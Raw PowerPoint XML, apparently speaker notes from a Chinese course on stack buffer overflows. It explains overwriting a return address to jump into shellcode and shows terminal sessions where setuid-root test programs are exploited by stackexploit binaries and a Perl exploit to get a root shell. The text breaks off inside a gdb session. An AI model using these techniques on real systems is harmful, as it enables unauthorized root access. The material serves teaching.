              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>首地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>large_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>里面的内容复制到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>里</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>溢出，溢出之后都是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>地址，然后转到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>处，执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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C4E01D8-26EB-463B-9C09-8298D2907347}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281602" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281603" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# gcc vulnerable1.c -o vulnerable1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# ls -l vulnerable1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>-rwxr-xr-x    1 root     root        11678  5ÔÂ 24 23:45 vulnerable1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# chmod u+s vulnerable1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# ls -l vulnerable1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>-rwsr-xr-x    1 root     root        11678  5ÔÂ 24 23:45 vulnerable1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# gcc stackexploit1.c -o stackexploit1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>-rwxr-xr-x    1 root     root        12455  5ÔÂ 25 09:11 stackexploit1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# chown zhugejw:zhugejw stackexploit1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>-rwxr-xr-x    1 zhugejw  zhugejw     12455  5ÔÂ 25 09:11 stackexploit1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[root@zhugejw stack]# su zhugejw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[zhugejw@zhugejw stack]$ whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>zhugejw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>[zhugejw@zhugejw stack]$ ./stackexploit1 400</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>ret is at 0xbfffec08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t> esp is at 0xbfffed88</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>buf's 0xbfffebc0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>sh-2.05b# whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>sh-2.05b# exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="900"/>
              <a:t>exit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="900"/>
              <a:t>－－－－－－－－－－－如何找到返回地址？－－－－－－－－－－－－</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="900"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="9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8677BF-7D0F-4E73-8298-C5282B561703}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282626" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282627" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# gcc vulnerable2.c -o vulnerable2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# chmod u+s vulnerable2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# ls -l vulnerable2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-rwsr-xr-x    1 root     root        11670  5ÔÂ 25 09:13 vulnerable2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# gcc stackexploit2.c -o stackexploit2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-rwxr-xr-x    1 root     root        12141  5ÔÂ 25 09:15 stackexploit2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# chown zhugejw:zhugejw stackexploit2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-rwxr-xr-x    1 zhugejw  zhugejw     12141  5ÔÂ 25 09:15 stackexploit2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[root@zhugejw stack]# su zhugejw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[zhugejw@zhugejw stack]$ ./stackexploit2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>buf's 0xbfffe350</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sh-2.05b# whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"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B2F0D2C-2A40-4507-9AFF-99EFC9D54FF6}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283650" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="283651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# gcc stackexploit3.c -o stackexploit3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>-rwxr-xr-x    1 root     root        12216  5ÔÂ 25 09:17 stackexploit3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# chown zhugejw:zhugejw stackexploit3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# ls -l stackexploit3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>-rwxr-xr-x    1 zhugejw  zhugejw     12216  5ÔÂ 25 09:17 stackexploit3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# su zhugejw</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[zhugejw@zhugejw stack]$ ./stackexploit3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>ret is at 0xbfffffb6</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>buf's 0xbffff760</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>sh-2.05b# whoami</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>－－－－－－－－－－－</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>《</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>网络渗透技术</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>》</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>书上的示例程序</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# gcc vulnerable.c -o vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# vi exploit.pl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="800"/>
              <a:t>程序的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>path</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw stack]# perl exploit.pl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[+] Using ret shellcode 0xbfffffb8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>???¿¸??¿¸??¿¸??¿¸??¿¸??¿¸??¿¸???</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw root]# ps ax | grep vulnerable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t> 5567 pts/2    S      0:00 /home/bof_codes/linux/stack/vulnerable ???¿¸??¿¸??¿¸??¿¸??¿¸??¿¸??¿¸???</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>[root@zhugejw root]# gdb vulnerable 5567</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Attaching to process 5567</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Reading symbols from /home/bof_codes/linux/stack/vulnerable...done.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="800"/>
              <a:t>Reading symbols from /lib/tls/libc.so.6...done.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
